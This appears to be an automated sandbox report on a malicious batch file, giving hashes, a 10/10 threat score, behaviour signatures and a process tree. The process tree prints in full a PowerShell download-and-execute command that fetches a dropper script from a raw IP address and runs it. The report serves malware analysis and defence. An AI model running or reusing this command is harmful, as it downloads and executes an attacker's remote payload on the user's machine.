Overview

overview

10

Static

static

61qVyZCf.bat

windows7_x64

10

61qVyZCf.bat

windows10_x64

10

Analysis

  • max time kernel
    105s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10v191014
  • submitted
    11-02-2020 18:10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    61qVyZCf.bat

  • Size

    189B

  • MD5

    b333d94ab42b4326dd0fd88ed1478a68

  • SHA1

    25f722c04783237a8195b64d6c08ea787991c6eb

  • SHA256

    ece31cd5ba841084557b618766ee4ec4e36796d0ece6191574a8eb615e01e909

  • SHA512

    1cfd9d628a71c3a6558ba135ad295db79c8dec2bbbc438a6a8a0c2cae5465aaa74fccfcc14a1b62cc17f443f6400750a4eba200e2b2ce170a031941b412be2b0

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/61qVyZCf

Signatures

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\61qVyZCf.bat"
    1⤵
      PID:5008
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/61qVyZCf');Invoke-IGMVZY;Start-Sleep -s 10000"
        2⤵
          PID:5052
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 704
            3⤵
            • Checks processor information in registry
            • Enumerates system info in registry
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:4292
      • \??\c:\windows\system32\taskhostw.exe
        taskhostw.exe -RegisterDevice -SettingChange -Full
        1⤵
          PID:3904

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • memory/4292-0-0x0000000004DD0000-0x0000000004DD1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4292-21-0x0000000005890000-0x0000000005891000-memory.dmp

          Filesize

          4KB

          Download

        • memory/4292-38-0x0000000005790000-0x0000000005792000-memory.dmp

          Filesize

          8KB

          Download